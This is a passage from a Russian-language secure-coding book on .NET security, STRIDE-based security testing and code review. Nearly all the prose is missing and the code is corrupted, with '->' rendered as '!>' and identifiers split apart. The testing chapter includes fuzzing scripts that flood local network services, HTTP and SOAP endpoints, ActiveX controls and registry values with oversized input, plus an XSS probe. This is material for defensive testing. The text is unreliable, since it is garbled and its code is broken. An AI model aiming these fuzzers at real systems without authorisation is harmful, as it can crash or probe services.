Brian Carol ,
EnvironmentPermission.
:
,
. , Private
KeyPermission ,
SetKey:
[PrivateKeyPermission
(SecurityAction.InheritanceDemand, Unrestricted=true)]
public virtual void SetKey(byte [] key) {
m_key = key;
DestroyKey(key);
}
, :
[StrongNameIdentityPermission(SecurityAction.LinkDemand,
PublicKey="00240fd981762 bd0000...172252f490edf20012b6")]
.
SiteLock ActiveX, 16.
, , :
. ,
, Web
. ! ,
(crosssite
scripting)!
18 .NET
481
// , explorationair.com
}
}
XML-
, .
, web.config, ,
, . ,
, .
.
, XCOPY (
), .
ASP.NET 1.1 Data Protection API
, . ( DPAPI
9.) <processModel>, <identity>
<sessionState>. ,
, .
ASP.NET
aspnet_setreg. ,
ASP.NET:
<system.web>
<processModel
enable="true"
userName="registry:HKLM\Software\SomeKey,userName"
password="registry:HKLM\Software\SomeKey,passWord"
...
/>
</system.web>
CryptProtectData .
,
,
,
.
,
ASP.NET .
,
, .NET
AllowPartiallyTrustedCallersAttribute. ,
, ,
482
III
. ,
,
,
.
CLR .NET
Framework, ,
, .
. ,
. .
,
,
, AllowPartiallyTrustedCallersAttribute ,
:
[Assembly:AllowPartiallyTrustedCallers]
, ,
,
.
! ,
.
, ,
,
,
AllowPartiallyTrustedCallersAttribute.
, ,
.
1. A AllowPartiallyTrustedCallersAttribute.
2. B ,
.
3. B A, A
.
! AllowPartiallyTrustedCallersAttribute
.
,
, ,
, ,
. SuppressUnma
18 .NET
483
nagedCodeSecurityAttribute,
, :
.
C/C++
.NET Framework . ,
, ,
. , :
. ,
. , AppA, ; AppB
AppA AddHandler. ,
, , ,
System.Environment.Exit. AppA
.
.
,
:
new EnvironmentPermission(
EnvironmentPermissionAccess.Read,"USERNAME").PermitOnly();
, PermitOnly ( ,
), , .
.
, ISerializable,
.
?
484
III
[Serializable()]
public class Password: ISerializable {
private String sensitiveStuff;
public Password() {
sensitiveStuff=GetRandomKey();
}
// .
public Password (SerializationInfo info, StreamingContext context) {
sensitiveStuff =
(String)info.GetValue("sensitiveStuff", typeof(string));
}
// .
public void GetObjectData
(SerializationInfo info, StreamingContext context) {
info.AddValue("sensitiveStuff", sensitiveStuff);
}
}
, sensitiveStuff,
( , !).
, :
[SecurityPermissionAttribute(SecurityAction.Demand,
SerializationFormatter=true)]
, /. ,
, . ,
, , ,
. C# , .
using System.IO.IsolatedStorage;
...
IsolatedStorageFile isoFile =
IsolatedStorageFile.GetStore(
IsolatedStorageScope.User | IsolatedStorageScope.Assembly,
,
,
: ,
,
, , .
Visual Basic.NET , .
18 .NET
485
Imports System.IO.IsolatedStorage
...
Dim isoStore As IsolatedStorageFile
isoStore = IsolatedStorageFile.GetStore( _
IsolatedStorageScope.User Or _
IsolatedStorageScope.Assembly Or _
IsolatedStorageScope.Domain, _
Nothing, Nothing)
,
, IsolatedStorageScope.Roaming.
Microsoft Windows
( Windows NT/2000
Windows 98),
.
IsolatedStorage
File. GetUserStoreForAssembly IsolatedStorageFile. GetUserStoreForDomain;
.
, ,
FileStream , FileIOPermission.
, , ,
,
.
XSLT !
XSLT (XSL Transformation) .NET
Framework,
System. Xml. Xsl. , XSLT ,
. XSLT
, ,
,
, XML.
ASP.NET
, , ,
. :
.
.
DEBUG IIS (Internet Information Services)
(. 186).
486
III
. 186. DEBUG
(), ,
SOAP
ASP.NET,
:
<customErrors> ASP.NET
remoteOnly,
.
,
. remoteOnly (
) On. Off ,
.
<configuration>
<system.web>
<customErrors>
defaultRedirect="error.htm"
mode="RemoteOnly"
<error statusCode="404"
redirect="404.htm"/>
</customErrors>
</system.web>
</configuration>
18 .NET
487
.
, ,
.NET. CLR System. Run
time. Serialization
(serializing).
, ,
,
.
,
SerializationFormatter. ,
.
,
, .NET. , MFC
CAr
chive::<> >> CArchive::<> <<. MFC
, ,
.
.NET
.
. :
try {
// ! .
} catch (Exception e) {
Result.WriteLine(e.ToString());
}
:
488
III
, .
Win
dows, .
try {
// ! .
} catch (Exception e) {
#if(DEBUG)
Result.WriteLine(e.ToString());
#else
Result.WriteLine(" .");
new LogException().Write(e.ToString());
#endif
}
public class LogException {
public void Write(string e) {
try {
new EventLogPermission(
EventLogPermissionAccess.Instrument,
"machinename").Assert();
EventLog log = new EventLog("Application");
log.Source="MyApp";
log.WriteEntry(e, EventLogEntryType.Warning);
} catch(Exception e2) {
// ! .
}
}
}
EventLogPermission(). Assert,
. , ,
, .
18 .NET
489
Microsoft .NET
http://msdn.microsoft.com. Security Concerns for
Visual Basic .NET and Visual C# .NET Programmers (
Visual Basic .NET Visual C# .NET) (http://msdn.microsoft.com/
library/enus/dv_vstechart/html/vbtchsecurityconcernsforvisualbasicnetprogrammers.asp)
.
I V
19
, ,
, ,
,
! ,
,
, . ;
.
,
.
, .
, ,
, .
, Microsoft Windows, Linux,
UNIX MacOS.
. .
; ,
.
, , ,
.
, ,
19
493
,
. , ,
:
.
,
. ,
,
.
,
, ,
.
, ,
, . :
,
.
,
. ,
.
, , , .
!
, .
! ,
. ,
!
, ,
.
, .
,
. :
, ,
, ,
,
,
. ,
, . ,
. :
494
IV
, ,
.
,
, .
, 2!
.
: ,
!, : ,
! .
,
.
,
, . , ,
, !
!
:
. ,
, ,
. .
http://www.securityfocus.com,
, .
-
,
,
. ,
, .
1. .
2. .
3. .
4. , .
5. , () .
:
,
,
,
. ,
.
19
495
,
. . ,
,
. ,
: , ,
(STRIDE), (DREAD
). .
, .
, , . ,
. , ,
?
,
,
. ,
.
.
. ,
, .
:
TCP UDP;
, ;
NetBIOS;
;
(Dynamic Data Exchange, DDE);
;
;
(
), ;
;
(local procedure call, LPC) (remote proce
dure call, RPC) ;
, COM;
ActiveX ( <OBJECT>);
EXE DLL;
/ ,
;
;
496
IV
HTTP;
SOAP (Simple Object Access Protocol);
RAPI (Remote API), ;
;
;
;
, OLE DB ODBC;
;
(storeandforward), ,
SMTP, POP MAPI
, MSMQ;
( );
;
;
LDAP, Active Directory;
, (IrDA), USB, COM
, FireWire (IEEE 1394), Bluetooth .
,
.
,
.
. (. 191) ,
. ,
: .
19-1.
, ,
, SYSTEM ( Microsoft Windows NT
) root ( UNIX Linux)
,
C C++, VB, C#, Perl .
C C++
2
1
1
2
1
497
19
19-1.
()
, , ,
,
.
!
,
. . 192
. ,
.
19-2.
, RPC, , NetBIOS
Active Directory
HTTP
HTTP, ,
, MIME,
XML,
SOAP
COM
argv[]
C C++, ,
WScript. Windows
WSH String[] args
C#
, ,
,
(test case).
, STRIDE.
STRIDE
, STRIDE,
,
.
498
IV
. . 410 ( 4)
.
.
. 193 , ,
,
. ,
( !).
. 193 ,
.
, , ,
, , DLL.
.
19-3.
(spoofing identity)
:
, ,
?
.
?
(,
cookie) , ?
:
,
?
(tampering with data)
.
,
?
, MAC ,
.
,
,
, SSL/TLS IPSec
(repudiation)
,
?
,
? ,
,
.
? (.
.)
19
19-3.
499
()
.
(Information disclosure)
(, .) .
(sniffer)
.
.
,
.
,
.
, .
DoS !
(DoS)
,
.
?
,
.
(,
,
) ?
,
(Elevation of privilege)
,
.
?
,
?
!
, .
! ,
,
.
, STRIDE,
. .
. (data muta
tion) , ,
, , .
500
IV
,
, , , ,
, .
,
DoS.
, , DoS,
.
DoS.
! DoS,
.
,
,
.
. 191 ,
.
(Cv)
(Cr)
Null (Cn)
(Ct)
(Cps)
(Cz)
(Cs)
(Nr)
(Cpm)
(Cpe)
(Co)
(Cps)
(No)
(Nh)
HTML (Cph)
(Cpq)
(Ol)
(Oa)
(Ll)
(Or)
(On)
(Od)
(Oe)
(Lz)
(Ls)
. 191.
, .
.
, DoS. ,
,
. ,
19
501
,
,
.
, .
(
) ( ).
( ) ,
. , , ,
, . , , ,
!
.
(Oa); ,
(ACE). (Or)
. ,
, ACE .
, , . Windows
, .
, ,
(Oe) (Od). ,
. , ?
?
, , ,
? ( UNIX) .
, ,
? 11,
.
(. 191). ,
, . ,
Config.xml, ,
( . 191 Ll), Myreallybigconfig.xml,
( . 191 Ls) , C.xml,? ,
(Cr), RfQy6J.87d?
, :
.
, . ,
, , .
.
, .
502
IV
(Cr) ,
,
. ,
, , ,
, . ,
.
, ,
Perl.
srand time;
my $size = 256;
my @chars = ('A'..'Z', 'a'..'z', 0..9, qw( ! @ # $ % ^ & * ! + = ));
my $junk = join ("", @chars[ map{rand @chars } (1 .. $s ize)]);
C C++ CryptGenRandom,
( ,
, 8). CryptGen
Random (. Secure
co2\Chapter19\PrintableRand).
/*
PrintableRand.cpp
*/
#include "windows.h"
#include "wincrypt.h"
DWORD CreateRandomData(LPBYTE lpBuff, DWORD cbBuff, BOOL fPrintable) {
DWORD dwErr = 0;
HCRYPTPROV hProv = NULL;
if (CryptAcquireContext(&hProv, NULL, NULL,
PROV_RSA_FULL,
CRYPT_VERIFYCONTEXT) == FALSE)
return GetLastError();
ZeroMemory(lpBuff, cbBuff);
if (CryptGenRandom(hProv, cbBuff, lpBuff)) {
if (fPrintable) {
char *szValid="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"abcdefghijklmnopqrstuvwxyz"
"0123456789"
"~`!@#$%^&*()_! +={}[];:'<>,.?|\\/";
DWORD cbValid = lstrlen(szValid);
// (0! 255)
// .
// , strlen(szValid)
19
503
// 255.
for (DWORD i=0; i<cbBuff; i++)
lpBuff[i] = szValid[lpBuff[i] % cbValid];
// .
// , .
lpBuff[cbBuff!1] = '\0';
}
} else {
dwErr = GetLastError();
}
if (hProv != NULL)
CryptReleaseContext(hProv, 0);
return dwErr;
}
void main(void) {
BYTE bBuff[16];
if (CreateRandomData(bBuff, sizeof bBuff, FALSE) == 0) {
// ! !
}
}
,
,
. : ,
.
. Perl ,
.
#
# '_' $MAX.
# .
# ! 128_000 128 000.
# , ?
my $MAX = 128_000;
for (my $i=1; $i < $MAX; $i *= 2) {
my $junk = 'A' x $i;
# $junk .
}
! ,
. ,
, .
(Barton P. Miller) Fuzz Revisited: A Reexamination of the Reliability
504
IV
, ,
, .
:
(Cs);
(Ct);
Null (Cn);
(Cz);
(Co);
(Cv).
(Cs) (Ct) .
, 0 0. [
. 0, , 0,
, (Ct).] Null , ;
.
.
: 09
092002, 09092002Jk17&61hhAn=_9jAMh.
.
,
, . , Web
, () , TIMESTAMP,
, ,
.
TIMESTAMP,
.
:
UNIX. . .
19
505
, ,
. , :
TIMESTAMP:
H7ahbsk (0kaaR
(
) , ,
:
TIMESTAMP:
09871662
RPC,
/robust MIDL (Microsoft Interface Definition Language).
RPC,
.
. RPC
,
, MIDL.
MIDL /robust
. , RPC
,
. RPC .
.
: , 1777,
, C++ :
// 2
// 2
// 128
, actAction 0, 1 2,
ACTION_QUERY, ACTION_GET_LAST_TIME
ACTION_SYNC, ,
, 132
. ,
actAction
, cbBlobSize bBlob . Perl
(. Secureco\Chapter19).
506
IV
# PackedStructure.pl
# TCP
# , 1777;
# ;
# MAX_BLOB, 'A'.
use IO::Socket;
my $MAX_BLOB = 128;
my $actAction = 0; # ACTION_QUERY
my $bBlob = 'A' x $MAX_BLOB;
my $cbBlobSize = 128;
my $server = '127.0.0.1';
my $port = 1777;
if ($socks = IO::Socket::INET!>new(Proto=>"tcp",
PeerAddr=>$server,
PeerPort => $port,
TimeOut => 5)) {
my $junk = pack "ssa128",$actAction,$cbBlobSize,$bB lob;
printf " $port (%d bytes)", length $ junk;
$socks!>send($junk);
}
Perl
ActiveState Visual Perl 1.0 http://www.acti
vestate.com.
pack. Perl
,
. ssa128,
( s) 128
(a128). pack ,
Unicode UTF8, (little endian) (big endian)
. .
pack Perl
,
.
,
XML (. 192 193).
, . ,
.
(Ll).
, ,
.
19
507
(Cl:Ll)
(Ol)
(Oa)
(Oa)
(Cs Co)
(Cl:Lz)
OnHand.xml
(Cl:Lz)
(Cr)
</items>
(Cpe)
(Cr)
. 192. XML,
OnHand.xml
(Cl:Lz)
(Cr)
. 193.
(Cl:Lz)
(Cr)
(Cl:Ll)
(Cl:Ll)
(Cl:Lz)
(Cp)
(Co)
</items>
, (Cw)
(Co)
(Co)
(Co)
(Cl:Ll)
, (Cv)
XML
Perl : ,
.
; ,
, , .
, ? (,
20.) :
my $cbBlobSize = 256;
# .
508
IV
256 .
128 , MAX_BLOB
(128) .
256 128 , 256
. 256
256 . , ,
, 128 .
, , ,
. ,
, , DoS.
my $cbBlobSize = 256_000;
# .
,
.
, .
: +
, ,
,
.
,
. :
.
15 .
, EIP.
( A),
, , ,
.
EIP
A B, ,
B, .
B
EIP, .
EIP , .
, ,
MAX_PATH,
. MAX_PATH
Windows 260.
, Unicode ANSI
, ANSI
, Unicode, .
19
509
, ,
, [ , (Cpq)
(Cpm)]
[, (Cpe)].
. 194.
19-4.
// /* */
C++, C# C
Perl
Visual Basic
<! >
HTML XML
SQL
;:
\n \r 0x0a 0x0d
\t
0x04
0x7f
0x00
<>
*?
, :
(Nr), (No)
(Nh).
. ( )
, ,
, . ,
cookie
, ,
, , (replay) ,
,
.
. , Data1, Data2 Data3,
: Data1, Data3
Data2. ,
Data1, Data2 Data3 .
.
:
510
IV
.
.
Perl ,
, C/C++, .NET
.
?
,
, !
: ,
.
. 17
, .
, ,
Hailstorm Cenzic.
,
(flooding) .
http:// www.cenzic.com.
.
, .
Performance Monitor ()
.
, ,
.
, Gflags.exe (
Windows 2000 Windows .NET)
, ; Oh.exe
; dh.exe
.
Windows 2000 Windows .NET.
! ,
. ?
,
. ,
.
19
511
, .
.
.
.
: , , ,
. , ,
,
. , Visual Basic
COM,
.
.
exploit, . ,
,
, .
:
. Sendmail,
(pipe bomb),
AIX 10.0 IBM,
.
,
, ,
!
.
. ,
, ,
. . ,
,
.
Perl,
. Perl
,
pack. ,
C++,
C++.
,
512
IV
HTTP-
Perl .NET Framework. :
, HTTP .
Perl C#, ,
, HTTP.
Perl (. Secureco2\Chapter19), HTTP
. Name, Address Zip
. Timestamp,
.
# SmackPOST.pl
use HTTP::Request::Common qw(POST GET);
use LWP::UserAgent;
# !.
my $ua = LWP::UserAgent!>new();
$ua!>agent("HackZilla/v42.42 WindowsXP");
# .
my $url = "http://127.0.0.1/form.asp";
my $req = POST $url, [Name => 'A' x 128,
Address => 'B' x 256,
Zip => 'C' x 128];
$req!>push_header("Timestamp:" => '1' x 10);
my $res = $ua!>request($req);
# .
# $err HTTP,
# $_ holds HTTP!.
my $err = $res!>status_line;
$_ = $res!>as_string;
print " !" if (/Illegal Operation/ ig || $err != 200);
, ,
Perl, LWP
WWW Perl (Library for WWW) HTTP,
.
(. Secureco2\Chapter19).
ISAPI test.dll, GET.
URL
(bogushdr), , H
256 , + ,
, 128 .
19
513
# SmackQueryString.pl
use LWP::UserAgent;
$bogushdr = ('H' x 256) . '\n\r';
$hdr = new HTTP::Headers(Accept => 'text/plain',
User!Agent => 'HackZilla/ 42.42',
Test! Header => $bogushdr x 128);
$urlbase = 'http://localhost/test.dll?data=';
$data = 'A' x 16_384;
$url = new URI::URL($urlbase . $data);
$req = new HTTP::Request(GET, $url, $hdr);
$ua = new LWP::UserAgent;
$resp = $ua!>request($req);
if ($resp!>is_success) {
print $resp!>content;
}
else {
print $resp!>message;
}
.NET Framework
WebClient, HttpGetClientProtocol HttpPostClientProtocol.
HTTP::Request::Common Perl,
. C# ,
WebClient ,
.
using System;
using System.Net;
using System.Text;
namespace NastyWebClient {
class NastyWebClientClass {
static void Main(string[] args) {
if (args.Length < 1) return;
string uri = args[0];
WebClient client = new WebClient();
client.Credentials = CredentialCache.DefaultCredentials;
client.Headers.Add
(@"IWonderIfThisWillCrash:" + new String('a',32000));
client.Headers.Add
(@"User!agent: HackZilla/v42.42 WindowsXP");
try {
//
514
IV
Perl Win32::Pipe, ,
, C++
. C++,
ACL .
.
.
19
515
,
, IDL (Interface Definition Language).
RPC /robust (
16),
RPC ,
RPC DCOM ,
IDL.
RPC, Microsoft!
, ,
C++. , ,
RPC. , . 191.
RPC DCOM ( ,
C++, )
,
, ,
, .
Automation, COM
IDispatch, C++
.
, ActiveX ,
ActiveX Web,
, . ActiveX
, ,
?
ActiveX- <OBJECT>
ActiveX, <OBJECT>,
, ActiveX. ,
HTML,
. ActiveX,
<OBJECT>.
, .
ActiveX
System Monitor, Sysmon.ocx ( CLASSID
C4D2D8E0D1DD11CE940F008029004347).
LogFileName. ,
2000 , .
,
. , .
<HTML>
<BODY>
<OBJECT ID="DISysMon" WIDTH="100%" HEIGHT="100%"
CLASSID="CLSID:C4D2D8E0!D1DD!11CE!940F!008029004347">
<PARAM NAME="_Version" VALUE="195000">
<PARAM NAME="_ExtentX" VALUE="21000">
516
IV
<PARAM
<PARAM
<PARAM
<PARAM
<PARAM
<PARAM
<PARAM
<PARAM
<PARAM
<PARAM
<PARAM
<PARAM
<PARAM
NAME="_ExtentY" VALUE="16000">
NAME="AmbientFont" VALUE="1">
NAME="Appearance" VALUE="0">
NAME="BackColor" VALUE="0">
NAME="BackColorCtl" VALUE="!2147483633">
NAME="BorderStyle" VALUE="1">
NAME="CounterCount" VALUE="0">
NAME="DisplayType" VALUE="3">
NAME="ForeColor" VALUE="!1">
NAME="GraphTitle" VALUE="Test">
NAME="GridColor" VALUE="8421504">
NAME="Highlight" VALUE="0">
NAME="LegendColumnWidths"
VALUE="!11 !12 !14 !12 !13 !13 !16">
<PARAM NAME="LegendSortColumn" VALUE="0">
<PARAM NAME="LegendSortDirection" VALUE="2097272">
<PARAM NAME="LogFileName" VALUE="aaaaaa...aaaaaaa"> // 2000 'a'
<PARAM NAME="LogViewStart" VALUE="">
<PARAM NAME="LogViewStop" VALUE="">
<PARAM NAME="ManualUpdate" VALUE="0">
<PARAM NAME="MaximumSamples" VALUE="100">
<PARAM NAME="MaximumScale" VALUE="100">
<PARAM NAME="MinimumScale" VALUE="0">
<PARAM NAME="MonitorDuplicateInstances" VALUE="1">
<PARAM NAME="ReadOnly" VALUE="0">
<PARAM NAME="ReportValueType" VALUE="4">
<PARAM NAME="SampleCount" VALUE="0">
<PARAM NAME="ShowHorizontalGrid" VALUE="1">
<PARAM NAME="ShowLegend" VALUE="1">
<PARAM NAME="ShowScaleLabels" VALUE="1">
<PARAM NAME="ShowToolbar" VALUE="1">
<PARAM NAME="ShowValueBar" VALUE="1">
<PARAM NAME="ShowVerticalGrid" VALUE="1">
<PARAM NAME="TimeBarColor" VALUE="255">
<PARAM NAME="UpdateInterval" VALUE="1">
<PARAM NAME="YAxisLabel" VALUE="Test">
</OBJECT>
</BODY>
</HTML>
( <PARAM NAME>) ,
HTML, HTML,
, HTML,
HTML, , ActiveX
. C# , HTML
.
using System;
using System.Text;
using System.IO;
19
namespace WhackObject {
class Class1 {
static Random _rand;
static int getNum() {
return _rand.Next(!1000,1000);
}
static string getString() {
StringBuilder s = new StringBuilder();
for (int i = 0; i < _rand.Next(1,16000); i++)
s.Append("A");
return s.ToString();
}
static void Main(string[] args) {
_rand = new Random(unchecked((int)DateTime.Now.Ticks));
string CRLF = "\r\n";
try {
string htmlFile = "test.html";
string prolog =
@"<HTML><BODY><OBJECT ID='DISysMon' WIDTH='100%' HEIGHT='100%'" +
"CLASSID='CLSID:C4D2D8E0!D1DD!11CE!940F!008029004347'>";
string epilog = @"</OBJECT></BODY></HTML>";
StreamWriter sw = new StreamWriter(htmlFile);
sw.Write(prolog + CRLF);
string [] numericArgs = {
"ForeColor","SampleCount",
"TimeBarColor","ReadOnly"};
string [] stringArgs = {
"LogFileName","YAxisLabel","XAxisLabel"};
for (int i=0; i < numericArgs.Length; i++)
sw.Write(@"<PARAM NAME={0} VALUE={1}>{2}",
numericArgs[i],getNum(),CRLF);
for (int j=0; j < stringArgs.Length; j++)
sw.Write(@"<PARAM NAME={0} VALUE={1}>{2}",
stringArgs[j],getString(),CRLF);
sw.Write(epilog + CRLF);
sw.Flush();
sw.Close();
} catch (IOException e){
Console.Write(e.ToString());
}
517
518
IV
}
}
}
, ,
.
.
<PARAM>, , (
,
).
Microsoft Internet Explorer,
;
.
,
,
. ,
, . 191.
, , ACL
. ,
, .
Perl File.txt,
Process.exe. :
0 32 000 A.
my $FILE = "file.txt";
my $exe = "program.exe";
my @sizes = (0,256,512,1024,2048,32000);
foreach(@sizes) {
printf "Trying $_ bytes\n";
open FILE, "> $FILE" or die "$!\n";
print FILE 'A' x $_;
close FILE;
# system().
'$exe $FILE';
}
, ,
FileMon (http://www.sysinternals.com).
,
Holodeck Canned Heat,
(Center for Software Engineering Research)
(Florida Institute of Technology).
http://se.fit.edu/projects.
(James A. Whittaker) How to Break Software: A Practical Guide
to Testing ( :
) (. ).
19
519
,
, Perl Win32::Registry.
.
, 1000 ,
, .
use Win32::Registry;
my $reg;
$::HKEY_LOCAL_MACHINE!>Create("SOFTWARE\\AdvWorks\\1.0\\Config",$reg)
or die "$^E";
my $type = 1; # string
my $value = 'A' x 1000;
$reg!>SetValueEx("SomeData","",$type,$value);
$reg!>Close();
'process.exe';
VBScript :
Perl ,
.
, .
520
IV
,
.
, $?, .
,
$? >>8, $?.
(. Secureco2\Chapter19)
, ,
. ,
,
.
# ExerciseArgs.pl
# .
my $exe = "process.exe";
my $iterations = 100;
#
my $NUMERIC = 0;
my $ALPHANUM = 1;
my $PATH = 2;
#
# /p ! , /i ! /n !.
my %opts = (
p => $PATH,
i => $NUMERIC,
n => $ALPHANUM);
# .
for (my $i = 0; $i < $iterations; $i++) {
print "Iteration $i";
# ?
my $numargs = 1 + int rand scalar %opts;
print " ($numargs args) ";
# .
my @opts2 = ();
foreach (keys %opts) {
push @opts2, $_;
}
# .
my $args = "";
for (my $j = 0; $j < $numargs; $j++) {
my $whicharg = @opts2[int rand scalar @opts2];
my $type = $opts{$whicharg};
my $arg = "";
19
521
522
IV
,
root, .
Solaris 2.5, 2.6, 7 8,
Sun Microsystems. setuid root
Whodo ,
root Sun (http://www.sec
urityfocus.com/bid/2935).
XML
, XML,
, XML.
. 191, XML,
,
. XML:
. ,
.
Perl,
.NET Framework Microsoft XML DOM (XML Document Object Model).
(. Secureco2\Chapter19)
XML JScript HTML. HTML,
XML.
19
523
524
IV
, XML
, XML .
, , ,
XML ,
! http://www.com
puterworld.com/rckey259/story/0,1199,NAV63_STO61979,00.html.
SOAP-
, SOAP , XML HTTP,
SOAP , XML HTTP! Perl (
Secureco2\Chapter19) , SOAP
SOAP.
SOAP
, SMTP , HTTP
.
# TestSoap.pl
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;
my $ua = LWP::UserAgent!>new();
$ua!>agent("SOAPWhack/1.0");
my $url = 'http://localhost/MySOAPHandler.dll';
my $iterations = 10;
# coinToss
my $HEADS = 0;
my $TAILS = 1;
open LOGFILE, ">>SOAPWhack.log" or die $!;
# SOAP
# , , ""!
my @soapActions=('','junk','foo.sdl');
for (my $i = 1; $i <= $iterations; $i++) {
print "SOAPWhack: $i of $iterations\r";
# .
my $soapAction = $soapActions[int rand scalar @soapActions];
$soapAction = 'S' x int rand 256 if $soapAction eq 'junk';
my
my
my
my
$soapNamespace = "http://schemas.xmlsoap.org/soap/envelope/";
$schemaInstance = "http://www.w3.org/2001/XMLSchema!instance";
$xsd = "http://www.w3.org/XMLSchema";
$soapEncoding = "http://schemas.xmlsoap.org/soap/encoding/";
19
525
my $spaces = coinToss() == $HEADS ? ' ' : ' ' x int rand 16384;
my $crlf = coinToss() == $HEADS ? '\n' : '\n' x int rand 256;
# SOAP!.
my $soapRequest = POST $url;
$soapRequest! >push_header("SOAPAction" => $soapAction);
$soapRequest!>content_type('text/xml');
$soapRequest!>content("<soap:Envelope " . $spaces .
" xmlns:soap=\"" . $soapNamespace .
"\" xmlns:xsi=\"" . $schemaInstance .
"\" xmlns:xsd=\"" . $xsd .
"\" xmlns:soapenc=\"" . $soapEncoding .
"\"><soap:Body>" . $crlf .
"</soap:Body></soap:Envelope>");
# .
my $soapResponse = $ua!>request($soapRequest);
# .
print LOGFILE "[SOAP Request]";
print LOGFILE $soapRequest!>as_string . "\n";
print LOGFILE "[WSDL response]";
print LOGFILE $soapResponse!>status_line . " ";
print LOGFILE $soapResponse!>as_string . "\n";
}
close LOGFILE;
sub coinToss {
return rand 10 > 5 ? $HEADS : $TAILS;
}
,
.
,
SoapHttpClientProtocol .NET Framework.
-
13 (cross
site scripting, XSS) , .
, Web
. , ,
,
13 .
XSS :
, .
526
IV
XSS
http://www.owasp.org.
, XSS
, , : Web
. Web
, ( cookie) .
. ,
HTTP, .
, , XSS
.
13. :
, XSS, ,
. , ,
<>>, , , Web
XSS.
.
[ (Cpm)] Web
.
Perl
. ,
, ,
XSS. : ,
XSS . ,
. XSS ,
. .
# CSSInject.pl
use HTTP::Request::Common qw(POST GET);
use LWP::UserAgent;
my $url = "http://127.0.0.1/test.asp";
my $css = "xyzzy";
$_ = buildAndSendRequest($url,$css);
# , .
if (index(lc $_, lc $css) != !1) {
print "Possible XSS issue in $url\n";
#
my $css = "<>>";
$_ = buildAndSendRequest($url,$css);
if (index(lc $_, lc $css) != !1) {
print ", XSS! $url\n";
} else {
19
527
.
. ,
.
!
,
. : ,
. (.
Secureco2\Chapter19), 80
, .
, ,
.
# TCPJunkServer.pl
use IO::Socket;
my $port = 80;
my $server = IO::Socket::INET!>new(LocalPort => $port,
Type => SOCK_STREAM,
528
IV
Reuse => 1,
Listen => 100)
or die " $port: $@\n";
while ($client = $server!>accept()) {
my $peerip = $client!>peerhost();
my $peerport = $client!>peerport();
my $size = int rand 16384;
my @chars = ('A'..'Z', 'a'..'z', 0..9,
qw( ! @ # $ % ^ & * ! + = ));
my $junk = join ("", @chars[ map{rand @chars } (1 . . $size)]);
print " $peerip:$peerport, ";
print " $size .\n";
$client!>send($junk);
}
close($server);
/
. ,
? ,
,
. , ,
, , .
!
( )
RunAs ,
.
, .
,
, .
. : ,
!
, Available for Registry Permissions Vulne
rability (http://www.microsoft.com/technet/security/bulletin/MS00095.asp) Offload
ModExpo Registry Permissions Vulnerability (http://www.microsoft.com/technet/security/
bulletin/MS00024.asp), ,
.
19
529
Windows 2000
,
. , .
;
. ,
, ,
.
! ,
.
:
,
. , ,
, ,
.
. 195 , Windows 2000
.
19-5.
Windows 2000
compatws
Users (),
. ,
ACL
NTFS. ACL
Users ,
Power Users ( )
hisecdc
,
ACL NTFS.
securedc (. )
Windows 2000 .
Power Users ( )
hisecws
securews. ACL
Power User Terminal Server Users (
) Power
Users ( )
rootsec
ACL
securedc
, ,
ACL NTFS
securews
, ,
ACL
NTFS. Power Users
( )
530
IV
,
securews, , securedc,
.
:
!
, . ,
?
. .
. .
IP ( 172.100.84.22),
, ,
( aaaaaaaaaaaaaaaaaaaa.100.84.22). ,
. ,
, :
aaaaaaaaaaaaaaaaaaaa.100.84.22
172.aaaaaaaaaaaaaaaaaaaa.84.22
172.100.aaaaaaaaaaaaaaaaaaaa.22
172.100.84.aaaaaaaaaaaaaaaaaaaa
.
1. .
?
exploit. IP
, .
IP.
2. exploit. ,
, .
. IP.
3. .
,
. , exploit,
.
19
531
.
,
.
,
. exploit
, ,
.
, .
. 191.
4. .
,
,
. ,
. .
: ,
. ,
. , ,
. ,
,
, .
, ,
.
, ,
,
, .
,
,
.
, .
,
.
,
!
532
IV
, . ,
. , :
A , B? ,
, . , ,
. .
1. .
2. .
3. .
(relative attack surface quotient, RASQ).
.
. ,
, Windows
ACL, Linux UNIX setuid,
root,
. ,
.
!
,
. ,
, ACL
, .
.
,
, RASQ. Win
dows (. 196).
19-6.
Windows
1,0
ISAPI
RPC
0,9
Web
1,0
0,6
0,8
1,0
0,4
0,7
0,8
0,9
533
19
19-6.
()
,
SYSTEM
0,9
0,9
Web
1,0
(Guest)
0,9
ACL
0,7
ACL
0,4
ACL
0,9
Windows
. 194.
400
350
300
250
200
150
100
50
0
Windows 2000
Windows .NET
Server
Windows .NET
Server
IIS
Windows XP
Windows XP
ICF
. 194.
Windows
,
, (
). , Linux OS/400
.
,
.
RASQ:
.
, RASQ, , 5%.
,
(function point analysis) .
, .
534
IV
.
, ,
, .
,
, ,
; STRIDE
.
.
.
,
. ,
.
20
,
, ,
.
. , , , ,
.
(, telnet
.) , ,
, .
,
. ,
.
, . (Jack Ganssle)
A Guide to Code Inspections ( ) (http://
www.ganssle.com/Inspections.pdf) ,
. ,
, .
,
. ,
, : ,
9 , ,
. 2030
, .
?
(reviewer) : (moderator),
(reader), (recorder) (author).
536
IV
.
.
, :
, , .
,
.
, .
, ,
. , ,
,
. , ,
,
. , , ,
. , :
,
.
,
. , RPC,
,
RPC. .
, .
, :
,
, . ,
, ,
, , .
, ,
API. : ,
, ,
.
,
.
? ?
?
, ,
.
. ,
, ,
, . ,
?
, ?
?
20
537
, .
. .
,
. 250 000 ,
. , ,
.
, , .
,
. , ,
.
. ,
,
,
. ,
.
,
. ,
, .
,
.
,
.
, .
, (
)
. ,
. ,
,
. ,
.
, . ,
1200 ,
, , ?
Windows Security Push 2002 ,
,
, .
: ,
.
; ,
538
IV
.
Microsoft
.
: , .
.
, ,
. ,
. , ,
: ?
, .
! , ,
, : ,
,
,
.
,
. ,
, .
.
, ,
.
, , , ,
.
,
.
, .
, ( 5)
strncpy, strcpy. , ,
NULL,
.
;
.
,
strncpy, strncat snprintf
. ,
. ,
.
20
539
;
.
, . ,
5 ,
. ,
, ,
exploit.
, .
DoS. _alloca
,
. , , _alloca,
.
Unicode ANSI,
.
WideCharToMultiByte:
int WideCharToMultiByte(
UINT CodePage,
DWORD dwFlags,
LPCWSTR lpWideCharStr,
int cchWideChar,
LPSTR lpMultiByteStr,
int cbMultiByte,
LPCSTR lpDefaultChar,
LPBOOL lpUsedDefaultChar
//
//
//
//
//
//
//
//
//
//
""
,
);
(Unicode)
, . MultiByteToWideChar
. ,
, ,
ANSI. API,
( ), DCOM
IIS C++. ,
, , ,
. , (
) ,
.
TCHAR.
char, WCHAR #define
